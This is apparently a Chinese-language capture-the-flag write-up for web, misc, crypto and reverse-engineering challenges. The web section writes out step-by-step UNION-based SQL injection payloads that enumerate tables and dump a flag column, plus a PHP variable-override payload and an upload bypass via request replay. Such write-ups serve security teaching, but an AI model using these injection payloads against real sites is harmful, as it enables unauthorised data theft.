web
web1
robots.txt协议
web2
简单sql注入
先查看有几个字段
1’ order by 4#
联合查询,查数据库
?id=-1’ union select 1,2,3,database()#
联合查询数据库的表
id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
查数据库中表的字段
id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=’fl4g’#
查询skctf_flag中的数据
id=-1’ union select 1,2,3,skctf_flag from fl4g#
web3
查看源代码发现只能上传图片
上传图片发现文件上传成功!filename:1.jpg
但要给我一个give_me_flag.php 我才给你flag!
bp抓包重放,send之后发现
我们在数据里面的最下面加入givemeflag
scend之后得到flag
web4
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($msg_giveme);
}
上面代码说明,不管是POST还是GER,必须带有’flag’参数。通过这里往下看
foreach ($_POST as $key => $value) {
$$key = $value;
上面的源码这里可以变量覆盖
比如说传入flag=cc
,则$flag=$cc
虽然传入flag参数后flag会被覆盖,但可以用别的变量保存flag。
传入a=flag&flag=a
则$a=$flag,$flag=$a
payload:?a=flag&flag=a
MISC
misc1
notepad++ 或者winhex或者记事本打开
直接搜索flag
misc2
解压得到两个文件 flag.zip(无法解压密码发现,里面有个文件和题目名字一样)猜测是明文攻击
先将 Yahiko.png
zip压缩一下(必须要用winrar
因为加密文件也是winrar压缩的)
使用ARCHPR
工具
点击开始之后,过了一会在点击暂停,点击确定,自动跳到保存文件
解压进docx 文件
修改颜色
misc3
用foremost提取出一张bmp图片,
用stegsolve打开,Analyse选择Data Extract,勾选r,g,b的三个0通道,save bin得到flag的图片。

flag

misc4
用winhex打开搜索ctf
CRYPTO
CRYPTO1
下载打开发现有个txt,打开进去发现,有一串看不懂的代码
浏览器f12,复制到console中确定
CRYPTO2
下载打开发现凯撒关键字猜测凯撒密码,直接在线解码
key输入1得到flag
CRYPTO3
Caesar bought 64 rabbits(中文意思是凯撒买了64之兔子)
猜测是套娃,加密顺序可能是凯撒—>base64—>rabbits三种加密
按着题目给的意思,我们要倒着去解密,显示rabbit,64只兔子可能是复数+个s,Rabbits
在是base64
在是凯撒密码遍历1
逆向
ida打开文件,找到main函数f5,就能看到flag
得到的像个base64,base64解密下得到flag。